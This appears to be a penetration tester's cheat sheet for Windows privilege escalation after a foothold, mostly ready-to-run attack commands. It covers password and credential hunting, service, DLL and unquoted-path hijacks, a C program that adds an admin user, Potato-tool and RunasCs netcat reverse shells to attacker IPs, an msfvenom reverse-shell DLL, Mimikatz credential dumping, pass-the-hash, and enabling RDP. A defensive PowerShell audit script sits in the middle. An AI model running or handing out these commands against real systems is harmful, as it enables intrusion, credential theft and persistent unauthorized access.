After Windows Foothold

Local Enumeration

cmd

User enum:

  • whoami
  • whoami /groups - display groups of current user
  • whoami /priv - check our privileges
  • net user - list all local users on the machine (service accounts such as inetserv are not included)
  • net user steve - get user info for steve
  • net group /domain - all local groups
  • net localgroup administrators - plain net localgroup can sometimes fail when we don’t have a logged-in session
  • net group "Domain Admins" /domain

  • dsquery user
  • dsquery computer
  • dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl - bit 32 of userAccountControl is PASSWD_NOTREQD, i.e. accounts that do not require a password

findstr (grep for Windows) commands: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/findstr

  • wmic cpu get DataWidth, Description, AddressWidth - check architecture
  • wmic qfe - check patches
  • wmic logicaldisk get caption, description, providername - lists drives

Network enum:

  • ipconfig or ipconfig /all
  • arp -a - lists the ARP cache (IP to MAC address mappings)
  • netstat -ano - which ports are listening/connected; take note of anything that is firewalled or was not shown in the original nmap scan

Running Processes/Services

  • tasklist - get a list of running processes
  • tasklist /SVC - show the services hosted in each process
  • net start - check which services are running

Scheduled Tasks:

  • schtasks /query /fo LIST /v
  • schtasks /query /fo LIST /v | findstr /i "TaskName:"

Search:

  • where /R c:\windows bash.exe - where in C:\Windows is bash.exe (/R means recursive)
  • dir /R - like ls -la

Password hunting:

  • findstr /si password *.txt *.ini *.config - searches the current directory and its subdirectories, ignoring case, for the string "password"
  • cmdkey /list - list the credentials stored on the machine
  • reg query HKLM /f pass /t REG_SZ /s - pay attention to ControlSet keys

Add user (if Admin):

  • net user $user $password /add
  • net localgroup Administrators $user /add

TCM Password Hunting:

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

Powershell

  • Get-LocalUser - get list of all local users
  • Get-LocalUser steve - same as net user steve
  • Get-LocalGroup - all local groups
  • Get-LocalGroupMember $groupName - list of users in that group
  • systeminfo - OS, version, architecture, etc
  • ipconfig /all - list all network interfaces
  • route print - display routing table containing all routes of the system
  • netstat -ano - list all active network connections
    • a = all active TCP connections as well as TCP and UDP ports
    • n = disable name resolution
    • o = show process ID for each connection
  • Get-Process - show running processes
  • Get-Process $processName | Format-List * - get all information about a process

Finding info about applications:

  • Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname - displays 32-bit applications (remove ‘select displayname’ for more info)
  • Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname - displays 64-bit applications (remove ‘select displayname’ for more info)

Searching for specific things:

  • Command for finding “.kdbx” (KeePass) files:
    • Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue (for Keepass db)
  • Command for finding sensitive XAMPP info files:
    • Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
  • Checking for files in home directory
    • Get-ChildItem -Path C:\Users\$user\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Runas:

  • runas /user:$user cmd - you will have to enter the password afterwards, but it gets a shell as that user
  • C:\Windows\System32\runas.exe /user:$DOMAIN\$User /savecred "C:\Windows\System32\cmd.exe /c $Command"
  • C:\Windows\System32\runas.exe /user:$DOMAIN\$User /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\proof.txt > $outputlocation.txt"
  • With Invoke-RunasCs.ps1:
    • Import-Module .\Invoke-RunasCs.ps1
    • Invoke-RunasCs svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.204 4444 -e cmd.exe'
    • If this doesn’t work, the issue may be the upload location of the nc binary.

  • Get-History - may not work
  • (Get-PSReadlineOption).HistorySavePath
    • Then cat or type the output file and check it for interesting files

Download file from remote server:

  • iwr -uri http://$kaliIP/file.ext -outfile file.ext

Checking privileges on service binaries

https://github.com/gtworek/Priv2Admin - which privileges can do what

  • icacls Windows utility or
  • Get-ACL - PowerShell Cmdlet

Other Techniques

TCM list of Automated Tools

Executables:

  • winPEAS.exe - Windows Privilege Escalation Awesome Script (check HackTricks because it has the checklist)
  • Seatbelt.exe - has to be compiled (.sln files open in Visual Studio)
  • Watson.exe - has to be compiled (.sln file)
  • SharpUp.exe

PowerShell

  • Sherlock.ps1 (predecessor to Watson)
  • PowerUp.ps1
  • jaws-enum.ps1 (jaws = just another windows script)

Other

  • windows-exploit-suggester.py (local from attack machine)
    • requires systeminfo output from the machine
    • seems to be mostly kernel exploits
  • Exploit Suggester (Metasploit)

PowerUp.ps1

  • Import-Module ./PowerUp.ps1 (or . .\PowerUp.ps1), then Invoke-AllChecks
  • Check the AbuseFunction column, which gives the necessary command

Registry Escalation:

  • reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
  • reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
  • If AlwaysInstallElevated is set to 1 under either of these keys, you can run any MSI with elevated permissions. Make an MSI and execute it.
  • PowerUp checks for this.
    • Note that you may need to execute any file written after running the Abuse Function.
    • Can also just create a .msi with msf.

Service Escalation - Registry (TCM)

Example for the regsvc service:

  • Powershell on target: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
    • take note if we have NT AUTHORITY\INTERACTIVE Allow Full Control for this service. If we do we can make a malicious executable run a command.
  • create a malicious .c file and compile it:
    • Example:
    • take an existing file and replace the command used by the system() function to: cmd.exe /k net localgroup administrators $user /add
    • x86_64-w64-mingw32-gcc $exploit.c -o $exploit.exe
    • this adds the $user to the administrators group
  • reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d $exploit.exe /f
  • sc start regsvc

Escalation Via Executable Files (TCM)

  • PowerUp.ps1
  • It will give a ServiceName, Path, ModifiablePath, … and AbuseFunction
  • Take $servicename.exe and replace the existing version in the modifiable path

Escalation via Startup Applications

  • icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • Generate the exe with msfvenom
  • Put the exe in the above folder
  • Need to reboot or have an administrator log in/out
  • Probably won’t see this in CTF or lab environment

DLL Hijacking

Go into process monitor and set filters for “Path ends with .dll” and “Result is NAME NOT FOUND”

  • We can overwrite if we can control the service and if the folder is writable
    • If we have a vulnerable service called dllsvc:
      1. sc start dllsvc (or stop first, then start)
      2. Then check ProcMon
      3. msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
      4. Then stop and start again
  • https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking

Escalation via Binary Paths

  • run PowerUp.ps1 - Invoke-AllChecks
  • If our user has the "SERVICE_CHANGE_CONFIG" permission on the daclsvc service:
    • sc config daclsvc binpath= "net localgroup administrators $user /add"
    • sc stop daclsvc and sc start daclsvc

Unquoted Service Path Escalation

  • PowerUp.ps1
  • Example service path: C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
  • when the system is trying to run this executable, it will check for Program.exe, Program Files.exe, Program Files\Unquoted.exe… etc. So the goal is to place our malicious executable in any of those directories we have write access to. The example lab uses: C:\Program Files\Unquoted Path Service\Common.exe

CVE-2019-1388

If you get a pop-up that says "To continue, enter an admin user name and password." and has a Show more details option, you may be able to open an Internet Explorer window showing the publisher’s certificate. It opens as a SYSTEM-level user, so you can use Internet Explorer to pop a shell.

  • Wheel
  • Save as
  • File
  • Search for cmd, then right click and open it. It will open as nt authority\system.

UAC Bypass

The goal is to replace a service exe and either restart the service or reboot (shutdown /r /t 0). Malicious.c file below:

  #include <stdlib.h>

  int main(void)
  {
      /* Each system() call runs through cmd.exe with the privileges of the
         service that executes this binary. */
      (void)system("net user poppop PartyParty123! /add");
      (void)system("net localgroup administrators poppop /add");

      return 0;
  }

Compile the C program above and you can use it to create a new admin user (poppop:PartyParty123!): i686-w64-mingw32-gcc adduser.c -o adduser.exe

Potato Family

When you have SeImpersonatePrivilege, remember to try transferring the nc.exe binary.

  • Check what version you need (.NET) (Check .NET version): reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
  • PrintSpoofer:
    • .\PrintSpoofer.exe -c "nc.exe $kaliIP $port -e cmd"
    • .\PrintSpoofer64.exe -i -c cmd
  • GodPotato: .\GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe $kaliIP $port"
  • Sweet Potato (where r.exe = msfvenom shell): .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc64.exe -a "<ip> <port> -e cmd"
  • Sweet Potato: .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"

Mimikatz (local)

One liner: .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

  1. privilege::debug
  2. token::elevate
  3. lsadump::sam
  4. sekurlsa::logonpasswords
  5. lsadump::dcsync /user:$domain\$user (to obtain the NTLM hash)
    • Then from kali: impacket-secretsdump -just-dc-user $user $domain.com/$user:"$password"@$targetIP
    • From kali: impacket-psexec -hashes 00000000000000000000000000000000:$NTLMhash Administrator@$targetIP
  • From a GUI, this must be run as admin (or in a cmd that is running as admin); UAC stops it otherwise.
  • sekurlsa::tickets can help steal a TGS or, even better, a TGT

Misc Windows Privesc

Running Processes Powershell

  • Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
    • NOTE: processes running at a higher privilege level are not fully visible from a lower-privileged Windows session

Search for unquoted service paths:

  • wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """
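The three misconfigurations enumerated above (AlwaysInstallElevated under Registry Escalation, a writable service key as in the regsvc example under Service Escalation - Registry, and the path resolution described under Unquoted Service Path Escalation and searched for with the wmic one-liner just above) can be audited together from the administrator's side. The script below is an added example and is not part of the original notes, PowerUp or HackTricks. It assumes an elevated PowerShell 5.1+ session on the host being audited; the $BroadPrincipals list is an assumption about which identities stand for "any logged-on user" and should be tuned per environment.

```powershell
# Added hardening audit (example code, not from the original notes, PowerUp or
# HackTricks). Assumes an elevated PowerShell 5.1+ session on the audited host.
# $BroadPrincipals is an assumption: identities whose write access means "any
# logged-on user can tamper with this"; tune it for your environment.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Select-BroadAllowRules {
    # Allow rules for broad principals that apply to the object itself.
    # Inherit-only rules affect children only, so they are skipped.
    param($Rules)
    foreach ($rule in $Rules) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if (($rule.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
        $rule
    }
}

function Get-InstallerPolicyValue {
    # AlwaysInstallElevated DWORD under HKLM or HKCU; 0 when the value is absent.
    param([ValidateSet('HKLM', 'HKCU')][string]$Hive)
    $item = Get-ItemProperty -Path "${Hive}:\Software\Policies\Microsoft\Windows\Installer" `
                             -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

function Test-DirPlantable {
    # Can a broad principal create a file in this (existing) directory?
    # CreateFiles is the bit that matters; Modify and FullControl both include it.
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    foreach ($rule in Select-BroadAllowRules (Get-Acl -LiteralPath $Dir).Access) {
        if (($rule.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::CreateFiles) -ne 0) { return $true }
    }
    return $false
}

function Test-ServiceKeyWritable {
    # Can a broad principal set values on the service key? SetValue alone is
    # enough to repoint ImagePath (the regsvc case above).
    param([string]$ServiceName)
    $acl = Get-Acl -LiteralPath "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName" -ErrorAction SilentlyContinue
    if ($null -eq $acl) { return $false }
    foreach ($rule in Select-BroadAllowRules $acl.Access) {
        if (($rule.RegistryRights -band [System.Security.AccessControl.RegistryRights]::SetValue) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePathCandidates {
    # For each auto-start service whose unquoted binary path contains spaces,
    # emit every file name CreateProcess tries before the real executable
    # (C:\Program.exe, C:\Program Files\Unquoted.exe, ...) and whether a broad
    # principal could plant a file there.
    Get-CimInstance Win32_Service | Where-Object {
        $_.StartMode -eq 'Auto' -and $_.PathName -and
        $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and
        $_.PathName -notlike "$env:SystemRoot\*"
    } | ForEach-Object {
        $svc = $_
        # Keep only the executable part; anything after .exe is arguments.
        $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service   = $svc.Name
                Candidate = $candidate
                Plantable = Test-DirPlantable (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

function Invoke-ServiceHardeningAudit {
    # Collects only the findings that need fixing, with the fix spelled out.
    $findings = [System.Collections.Generic.List[object]]::new()
    # Both hives must be 1 for MSI packages to install as SYSTEM.
    if ((Get-InstallerPolicyValue HKLM) -eq 1 -and (Get-InstallerPolicyValue HKCU) -eq 1) {
        $findings.Add([pscustomobject]@{ Check = 'AlwaysInstallElevated'; Subject = 'HKLM + HKCU'
            Fix = 'set both values to 0 via the Windows Installer policy (Computer and User Configuration)' })
    }
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (Test-ServiceKeyWritable $svc.Name) {
            $findings.Add([pscustomobject]@{ Check = 'ServiceKeyAcl'; Subject = $svc.Name
                Fix = 'remove SetValue/WriteKey for non-admin principals on the Services\<name> key' })
        }
    }
    foreach ($c in Get-UnquotedServicePathCandidates | Where-Object Plantable) {
        $findings.Add([pscustomobject]@{ Check = 'UnquotedServicePath'; Subject = "$($c.Service) -> $($c.Candidate)"
            Fix = 'quote the binPath= value with sc config and tighten the directory ACL' })
    }
    return $findings
}

$result = Invoke-ServiceHardeningAudit
if (@($result).Count -eq 0) { 'No findings' } else { $result | Format-Table -AutoSize -Wrap }
```

Run it from an elevated prompt; with an elevated session HKCU is the administrator's own hive, so the AlwaysInstallElevated check reflects that user's policy. Skipping inherit-only rules matters: the default C:\ ACL grants Authenticated Users Modify as inherit-only, which a naive ACL scan would misreport as "anyone can drop C:\Program.exe".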

Check to see if you have the ability to do privileged writes i.e. writing to System32. There are exploits available on hacktricks.

show firewall profile:

  • netsh advfirewall show currentprofile
  • netsh advfirewall firewall show rule name=all

Enumerate Installed Programs

  • wmic product get name, version, vendor

Enumerate Windows Updates

  • wmic qfe get Caption, Description, HotFixID, InstalledOn

Check for folders/files Everyone can write to:

  • Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

List drivers:

  • (powershell, wrapping driverquery.exe) driverquery.exe /v /fo csv | ConvertFrom-Csv | Select-Object 'Display Name', 'Start Mode', Path
  • (powershell) Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Notes:

  • Run ls, Get-ChildItem, or gci with -force (like ls -la but for Windows)

Post Exploit

From HackTricks: enable Remote Desktop

  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • netsh firewall add portopening TCP 3389 "Remote Desktop"

  • ::netsh firewall set service remotedesktop enable - I found that this line is not needed
  • ::sc config TermService start= auto - I found that this line is not needed
  • ::net start Termservice - found that this line is not needed